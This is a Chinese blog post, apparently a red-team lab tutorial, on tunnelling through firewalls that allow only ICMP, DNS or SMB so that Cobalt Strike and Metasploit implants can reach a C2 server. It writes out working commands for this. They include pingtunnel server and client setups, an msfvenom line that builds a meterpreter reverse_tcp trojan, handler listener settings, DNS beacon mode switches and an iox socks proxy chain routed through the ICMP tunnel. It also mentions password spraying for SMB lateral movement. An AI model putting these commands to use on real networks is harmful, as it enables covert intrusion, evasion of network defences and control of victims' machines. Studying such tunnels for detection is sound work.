内网对抗-隧道技术篇&防火墙组策略&ICMP&DNS&SMB协议&出网判断&C2上线&解决方案

已于 2024-08-02 16:30:21 修改
阅读量1.1k 收藏 8
点赞数 12
分类专栏: # 内网篇 文章标签: 内网 隧道 防火墙 ICMP DNS SMB
于 2024-07-17 16:23:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/140497324
版权

知识点:

1、隧道技术篇-网络层-ICMP协议-判断&封装&建立&穿透(可上线C2并搭建socks代理)
2、隧道技术篇-传输层-DNS协议-判断&封装&建立&穿透(可上线C2但不支持搭建socks代理)
3、隧道技术篇-表示层-SMB协议-判断&封装&建立&穿透(需要口令横向移动上线C2)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

0、不是有互联网才叫出网

1、C2常见上线采用的协议

在这里插入图片描述

2、常见的协议层出网判断

协议 判断命令
ICMP ping ip or domain
HTTP curl ip or domain
SSH ssh ip or domain
DNS nslookup domain
TCP telnet ip port
...    ................

3、常用的隧道技术

利用各种隧道技术,以网络防火墙允许的协议,
绕过网络防火墙的封锁,实现访问被封锁的目标网络(C2上线、信息收集)
网络层:IPv6 隧道、ICMP 隧道
传输层:TCP 隧道、UDP 隧道、常规端口转发
应用层:SSH 隧道、HTTP/S 隧道、DNS 隧道

一、演示案例-隧道技术-ICMP-探针&搭建-C2上线&穿透

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
C2上线-开防火墙入站只80&出站只放ICMP:
ICMP 通过 PING 命令访问远程计算机,建立 ICMP 隧道,将 TCP/UDP 数据封装到 ICMP 的 PING 数据包中,从而穿过防火墙,防火墙一般不会屏蔽 PING 数据包,实现不受限制的访问。

应用场景:80为入口权限点,ICMP为上线突破口
适用场景:目标入站正向被拦截,出站有ICMP出网
排查出网协议:curl nslookup ping等命令

CS上线

ICMP隧道工具(把tcp/udp流量封装成icmp协议)-pingtunnel

https://github.com/esrrhs/pingtunnel

在这里插入图片描述
在这里插入图片描述

服务端
./pingtunnel -type server

在这里插入图片描述

客户端
pingtunnel -type client -l :6666 -s 192.168.139.141 -t 192.168.139.141:7777 -tcp 1 -noprint 1 -nolog 1

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

CS监听器配置

127.0.0.1 6666(后门生成)
为什么生成http后门,因为http协议其实是属于tcp协议。
在这里插入图片描述
在这里插入图片描述
192.168.139.141 7777(监听上线)
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

MSF上线

ICMP隧道工具(把tcp/udp流量封装成icmp协议)-pingtunnel

服务端
./pingtunnel -type server  
客户端
pingtunnel -type client -l :3333 -s 192.168.139.141 -t 192.168.139.141:3344 -tcp 1 -noprint 1 -nolog 1

生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe -o msf.exe

MSF监听器配置

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3344
run

在这里插入图片描述

二、演示案例-隧道技术-DNS-探针&搭建-C2上线&穿透

在这里插入图片描述
C2上线-开防火墙入站只80&出站只放DNS:
应用场景:80为入口权限点,DNS为上线突破口
适用场景:目标入站正向被拦截,出站有DNS出网
排查出网协议:curl nslookup ping等命令

在这里插入图片描述

CS上线

域名申请及配置(域名绑定一个外网VPS)

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

监听器创建及配置

在这里插入图片描述

后门绑定监听器生成

在这里插入图片描述
在这里插入图片描述

checkin
mode dns-txt

在这里插入图片描述
在这里插入图片描述

MSF上线

MSF的DNS模块已删除

通讯

不支持搭建socks代理隧道,只支持两个主机通过dns隧道通讯(就外网VPS能和一个对外的WEB服务器通过DNS隧道创建一个专属虚拟dns网卡来进行互相通讯,仅此而已)

在这里插入图片描述

三、演示案例-C2上线-SMB-开防火墙入站只445

在这里插入图片描述
SMB一般在防火墙入站默认是开启的,判断目标端口是否开放
适用场景:防火墙放行的WEB入口打不下来利用放行的SMB移动获取权限
利用条件:密码喷射或已知口令的情况下直接正向SMB横向移动拿下

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

四、演示案例-后续穿透问题

ICMP穿透-Pingtunel配合iox代理Socks内网穿透

在这里插入图片描述

在这里插入图片描述
https://github.com/EddieIvan01/iox
在这里插入图片描述

C2服务器

接收客户端传递的ICMP

./pingtunnel -type server -noprint 1 -nolog 1 -key 000000

在这里插入图片描述
将本地4455转至5566端口

./iox.exe proxy -l 4455 -l 5566

在这里插入图片描述

Web

将本地2222的TCP封装IMCP给192.168.139.141:4455

pingtunnel -type client -l 127.0.0.1:2222 -s 192.168.139.141 -t 192.168.139.141:4455 -tcp 1 -noprint 1 -nolog 1 -key 000000

在这里插入图片描述
建立SockS节点绑定2222端口:

iox.exe proxy -r 127.0.0.1:2222

在这里插入图片描述
之后C2服务器会行成一个socks5代理
在这里插入图片描述

本地

在这里插入图片描述
在这里插入图片描述

SuperherRo
关注
  • 12
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
红队内网攻防渗透:内网渗透之内网对抗隧道技术&防火墙组策略&ICMP&DNS&SMB协议&出网判断&C2上线&解决方案
HACKONE的博客
06-21 358
ICMP 通过 PING 命令访问远程计算机,建立 ICMP 隧道,将 TCP/UDP 数据封装到 ICMP 的 PING 数据包,从而穿过防火墙防火墙一般不会屏蔽 PING 数据包,实现不受限制的访问。添加新的A记录 这里按照C2重新新建一个主机记录将C2.xiaodi8.com指向我们的CS服务器地址。现在成功上线了web,但是要使用web服务器访问2.22的网站访问不了,出站是允许icmp。利用各种隧道技术,以网络防火墙允许的协议,绕过网络防火墙的封锁,实现访问被封锁的目标网络。
如何在Windows配置防火墙以允许ICMP通信(让Ping飞!)
weixin_72910567的博客
08-21 8622
此命令将删除名为 "Allow ICMPv4-In" 的入站规则,从而撤销您之前添加的ICMPv4 echo请求(ping请求)的允许规则。执行此命令后,ICMPv4数据包将不再被允许通过Windows防火墙,除非有其他允许此类数据包的规则。要允许ICMP数据包(例如ping请求)通过Windows防火墙,您需要修改入站规则来允许ICMP通信。此命令将添加一个新的入站规则,允许ICMPv4 echo请求(ping请求)通过Windows防火墙。右键点击选的规则,然后选择“启用规则”。选择“系统和安全”。
红队内网攻防渗透:内网渗透之内网对抗隧道技术&防火墙组策略&FRP&NPS&Chisel&Socks代理&端口映射&C2上线
HACKONE的博客
06-21 663
目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,DNS解析等),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。Frp是专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS等多种协议。服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)建立客户端连接服务端后将141上5555给到服务端6666上。服务端启动:frps -c frps.ini。
第71天:内网安全-域横向网络&传输&应用层隧道技术1
08-03
1.代理和隧道技术区别 2.隧道技术为了解决什么 3.隧道技术前期的必备条件 1.双向连接反弹 shell 2.多向连接反弹 shell-配合转发 3.相关 n
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
内网安全是一个重要的议题,尤其是在企业环境,域横向PTH、PTK、PTT哈希票据传递是其的关键攻击手段。这些方法主要针对Kerberos协议的弱点,利用NTLM哈希、Kerberos票据和AES密钥来绕过认证过程,从而在内部网络...
红队内网攻防渗透:内网渗透之内网对抗:横向移动&入口差异&切换上线&IPC管道&AT&SC任务&Impacket套件&UI插件
06-22
本文将深入探讨“红队内网攻防渗透”,重点介绍内网对抗的横向移动策略、不同入口差异、上线切换技巧,以及利用IPC管道、AT任务、SC服务、Impacket工具套件和UI插件等技术手段。 首先,横向移动是内网渗透的关键...
AT-SNMPc7-CN eval(内网管理工具)
02-28
AT-SNMPc7-CN eval(内网管理工具)
SANGFOR_AC&SG_v11.0_2016年度渠道高级认证培训01_安装部署.ppt
05-08
【SANGFOR AC&SG v11.0 安装部署】主要涵盖了高可用性和特殊网络环境下的设备部署策略,包括主主模式和主备模式的部署,以及内网有代理服务器环境和协议封装环境的部署。以下是这些知识点的详细说明: **高可用性之...
韦东山imx6ullpro完全开发书册
08-15
韦东山imx6ullpro完全开发书册
使用html+css +js 实现天猫首页效果.zip
08-15
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松copy复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全栈开发),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助 【资源内容】:项目具体内容可查看/点击本页面下方的*资源详情*,包含完整源码+工程文件+说明(若有)等。【若无积分,此资源可私信获取】 【本人专注IT领域】:有任何使用问题欢迎随时与我联系,我会及时解答,第一时间为您提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【适合场景】:相关项目设计,皆可应用在项目开发、毕业设计、课程设计、期末/期/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面 可借鉴此优质项目实现复刻,也可基于此项目来扩展开发出更多功能 #注 1. 本资源仅用于开源学习和技术交流。不可商用等,一切后果由使用者承担 2. 部分字体及插图等来自网络,若是侵权请联系删除,本人不对所涉及的版权问题或内容负法律责任。收取的费用仅用于收集和整理资料耗费时间的酬劳
Python基于机器学习的电信用户流失预测项目源代码+数据集(高分项目)
08-15
Python基于机器学习的电信用户流失预测项目源代码+数据集(高分项目),含有代码注释,新手也可看懂,个人手打98分项目,导师非常认可的高分项目,期末大作业和课程设计高分必看,下载下来,简单部署,就可以使用。 Python基于机器学习的电信用户流失预测项目源代码+数据集(高分项目),含有代码注释,新手也可看懂,个人手打98分项目,导师非常认可的高分项目,期末大作业和课程设计高分必看,下载下来,简单部署,就可以使用。 Python基于机器学习的电信用户流失预测项目源代码+数据集(高分项目),含有代码注释,新手也可看懂,个人手打98分项目,导师非常认可的高分项目,期末大作业和课程设计高分必看,下载下来,简单部署,就可以使用。Python基于机器学习的电信用户流失预测项目源代码+数据集(高分项目),含有代码注释,新手也可看懂,个人手打98分项目,导师非常认可的高分项目,期末大作业和课程设计高分必看,下载下来,简单部署,就可以使用。 Python基于机器学习的电信用户流失预测项目源代码+数据集(高分项目),含有代码注释,新手也可看懂,个人手打98分项目,导师非常认可的高分项目,期末大作业和课
JavaWeb实现超市订单管理系统smbms.zip
08-15
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松copy复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全栈开发),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助 【资源内容】:项目具体内容可查看/点击本页面下方的*资源详情*,包含完整源码+工程文件+说明(若有)等。【若无积分,此资源可私信获取】 【本人专注IT领域】:有任何使用问题欢迎随时与我联系,我会及时解答,第一时间为您提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【适合场景】:相关项目设计,皆可应用在项目开发、毕业设计、课程设计、期末/期/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面 可借鉴此优质项目实现复刻,也可基于此项目来扩展开发出更多功能 #注 1. 本资源仅用于开源学习和技术交流。不可商用等,一切后果由使用者承担 2. 部分字体及插图等来自网络,若是侵权请联系删除,本人不对所涉及的版权问题或内容负法律责任。收取的费用仅用于收集和整理资料耗费时间的酬劳
未来社区及其趋势探索(戴德梁行)PDF(52页).pdf
08-15
未来社区的建设背景和需求分析指出,随着智能经济、大数据、人工智能、物联网、区块链、云计算等技术的发展,社区服务正朝着数字化、智能化转型。社区服务渠道由分散向统一融合转变,服务内容由通用庞杂向个性化、服务导向转变。未来社区将构建数字化生态,实现数据在线、组织在线、服务在线、产品智能和决策智能,赋能企业创新,同时注重人才培养和科研平台建设。 规划设计方面,未来社区将基于居民需求,打造以服务为心的社区管理模式。通过统一的服务平台和应用,实现服务内容的整合和优化,提供灵活多样的服务方式,如推送式、订阅式、热点式等。社区将构建数据与应用的良性循环,提高服务效率,同时注重生态优美、绿色低碳、社会和谐,以实现幸福民生和产业发展。 建设运营上,未来社区强调科学规划、以人为本,创新引领、重点突破,统筹推进、整体提升。通过实施院落+社团自治工程,转变政府职能,深化社区自治法制化、信息化,解决社区治理的重点问题。目标是培养有活力的社会组织,提高社区居民参与度和满意度,实现社区治理服务的制度机制创新。 未来社区的数字化解决方案包括信息发布系统、服务系统和管理系统。信息发布系统涵盖公共服务类和社会化服务类信息,提供政策宣传、家政服务、健康医疗咨询等功能。服务系统功能需求包括办事指南、公共服务、社区工作参与互动等,旨在提高社区服务能力。管理系统功能需求则涉及院落管理、社团管理、社工队伍管理等,以实现社区治理的现代化。 最后,未来社区建设注重整合政府、社会组织、企业等多方资源,以提高社区服务的效率和质量。通过建立社区管理服务综合信息平台,提供社区公共服务、社区社会组织管理服务和社区便民服务,实现管理精简、高效、透明,服务快速、便捷。同时,通过培育和发展社区协会、社团等组织,激发社会化组织活力,为居民提供综合性的咨询和服务,促进社区的和谐发展。
AuToGraFS-2.3.1-py3-none-any.whl.zip
08-15
AuToGraFS-2.3.1-py3-none-any.whl.zip
JSP-基于web的工厂新闻管理系统(源码+数据库+论文).rar
08-15
首先,论文简要介绍了工厂新闻管理系统的背景和本次开发过程会使用的一些技术并且介绍了一下,技术包括有当前做系统毕竟流行的java语言,以及jsp技术,同样在开发web类系统也少不了我们神奇的SSM框架,最后使用近年势头很猛的免费数据库mysql作为本论文使用的数据库。随后我叙述了这个系统的绣球分析,并画出了主要的流程图,功能分析同时给出了相应的功能模块图,最后进行了小恒他的分析,包括系统设计和数据库分析,并且给出了本次系统的主要ER结构;系统实现主要是使用SSM框架、JSP和MySQL数据库实现系统功能;系统测试主要是对系统的功能和性能进行测试,保证系统的稳定性和可靠性。 本论文的主要贡献在于提出了基于SSM框架、JSP和MySQL数据库的工厂新闻管理系统,该系统能够实现工厂内部新闻的发布和管理,提高了工厂内部信息交流和管理的效率和准确性。此外,该系统还具有可扩展性和灵活性,可以根据不同的工厂需求进行个性化定制。 总之,基于Web的工厂新闻管理系统具有重要的应用价值和发展前景。未来,可以通过进一步完善系统功能和提高系统性能等方面的改进,进一步提高该系统的实用性和适用性
最详细最傻瓜的git使用教程最详细最傻瓜的git使用教程
最新发布
08-15
最详细最傻瓜的git使用教程最详细最傻瓜的git使用教程
AuToGraFS-2.3.2-py3-none-any.whl.zip
08-15
AuToGraFS-2.3.2-py3-none-any.whl.zip
内网渗透--ICMP隧道
05-16
ICMP隧道是一种利用Internet控制消息协议ICMP)的技术,将其他协议的数据包封装在ICMP数据包,从而在不被检测的情况下在网络传输数据。对于内网渗透而言,ICMP隧道可以用于将攻击者的数据从受害主机转出,绕过防火墙和其他网络安全设备的检测和过滤。 ICMP隧道的实现需要两个端点:一个客户端和一个服务器端。客户端将要传输的数据封装在ICMP数据包发送给服务器端,服务器端接收到ICMP数据包后解析其的数据,然后将数据还原成原始数据包,再转发给目标主机。通过这种方式,攻击者可以在内网传输各种类型的数据,包括命令和控制信息。 然而,ICMP隧道也有缺点。由于ICMP数据包通常被认为是网络的一部分,因此可能不会被网络安全设备视为可疑流量。然而,如果攻击者的网络流量被监测到,这种技术可能被检测出来,因此需要谨慎使用。此外,ICMP隧道还可能会导致网络延迟和丢包等问题,影响传输速度和数据完整性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值